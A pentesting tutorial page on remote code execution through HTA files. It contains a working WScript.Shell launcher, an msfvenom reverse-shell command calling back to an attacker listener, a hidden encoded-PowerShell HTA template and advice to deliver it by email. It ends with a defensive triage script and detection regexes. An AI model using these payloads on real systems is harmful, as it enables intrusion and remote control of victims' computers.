HackBook.io
  • Pentesting Pocket Book for hackers and developers.
ActiveXObject to Wscript RCE


Last updated 3 years ago


In this example, we will leverage ActiveXObject, which can potentially (and dangerously) provide access to underlying operating system commands. This is achieved through the Windows Script Host (WScript) functionality, and in particular the Windows Script Host Shell object. Once we instantiate a Windows Script Host Shell object, we can invoke its Run method in order to launch an application on the target client machine.

--------------------poc.hta--------------------
<script>
var c = 'cmd.exe';                             // application to launch on the client
new ActiveXObject('WScript.Shell').Run(c);     // WScript.Shell.Run starts the process
self.close();                                  // close the mshta window afterwards
</script>

We can save this as poc.hta and serve it with Apache. Opening it will launch cmd.exe on the user's computer. The user will first be prompted with (screenshot not reproduced here):

then, if they click to open it, they will get a second prompt (screenshot not reproduced here):

This second message appears when the Internet Explorer sandbox "Protected Mode" is turned on (the default). mshta.exe will also have its own command prompt window open, which is why we close it (self.close()) after we launch our process.

RCE via an HTA that launches PowerShell (the hta-psh format is "HTA to PowerShell"):

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

The PowerShell flags used in the generated file:

  • -nop is shorthand for -NoProfile, which instructs PowerShell not to load the PowerShell user profile. When PowerShell is started, it will, by default, load any existing user's profile scripts, which might negatively impact the execution of our code.
  • -w hidden is shorthand for -WindowStyle hidden.
  • -e is shorthand for -EncodedCommand and allows us to supply a Base64 encoded PowerShell script directly as a command line argument.

----------------- evil.hta -----------------
<html>
<head>
<script language="VBScript">
' Move the mshta window off-screen so the user does not see it
window.moveTo -4000, -4000
Set iKqr8BWFyuiK = CreateObject("Wscript.Shell")
Set t6tI2tnp = CreateObject("Scripting.FileSystemObject")
' Locate powershell.exe relative to each %PSModulePath% entry and run the encoded command
For each path in Split(iKqr8BWFyuiK.ExpandEnvironmentStrings("%PSModulePath%"),";")
  If t6tI2tnp.FileExists(path + "\..\powershell.exe") Then
    iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e PUT_YOUR_BASE64_ENCODED_COMMAND_HERE"
  End If
Next
</script>
</head>
<body>
<script>
self.close();
</script>
</body>
</html>
-----------------------Then open a listener and wait for the user to trigger it -----------------
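From the defender's side, both poc.hta and the hta-psh file above share the same fingerprint: a WScript.Shell object, a Run call, an off-screen window move and, in the msfvenom variant, a PowerShell -e argument whose Base64 is UTF-16LE text. The triage script below is an added example, not part of this page or of msfvenom; it flags those indicators in a suspected .hta and decodes the embedded command. The sample HTA is constructed inline with a harmless Write-Output command so it runs offline.

```python
import base64
import re

# Constructed sample in the same shape as the hta-psh output above, with a harmless
# command embedded; the real file would carry the attacker's encoded script instead.
SAMPLE_B64 = base64.b64encode("Write-Output 'hello'".encode("utf-16le")).decode("ascii")
SAMPLE_HTA = f"""<html><head><script language="VBScript">
window.moveTo -4000, -4000
Set sh = CreateObject("Wscript.Shell")
sh.Run "powershell.exe -nop -w hidden -e {SAMPLE_B64}"
</script></head><body><script>self.close();</script></body></html>"""

# Indicators present in both HTA payloads on this page (hypothetical names, chosen here).
INDICATORS = {
    "wscript_shell": re.compile(
        r"(CreateObject|ActiveXObject)\s*\(\s*['\"]WScript\.Shell['\"]\s*\)", re.I),
    "run_call": re.compile(r"\.Run\b", re.I),
    "offscreen_window": re.compile(r"window\.moveTo\s+-?\d+\s*,\s*-?\d+", re.I),
    "encoded_powershell": re.compile(
        r"powershell(?:\.exe)?[^\"']*\s-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I),
}


def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand is Base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16le")


def triage_hta(content: str) -> dict:
    """Report which indicators matched, whether the file looks like a script-host
    launcher, and the decoded PowerShell command if one is embedded."""
    hits = {name: bool(rx.search(content)) for name, rx in INDICATORS.items()}
    result = {"indicators": hits, "decoded_command": None}
    m = INDICATORS["encoded_powershell"].search(content)
    if m:
        try:
            result["decoded_command"] = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            result["decoded_command"] = "<undecodable>"
    # A shell object plus a Run call is enough to escalate the file for review.
    result["suspicious"] = hits["wscript_shell"] and hits["run_call"]
    return result


if __name__ == "__main__":
    print(triage_hta(SAMPLE_HTA))
```

The same regexes can be fed the text of poc.hta, which trips wscript_shell and run_call but has no encoded command to decode.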

Since the link to the HTML Application can be delivered via email, we can even compromise NAT’d internal clients.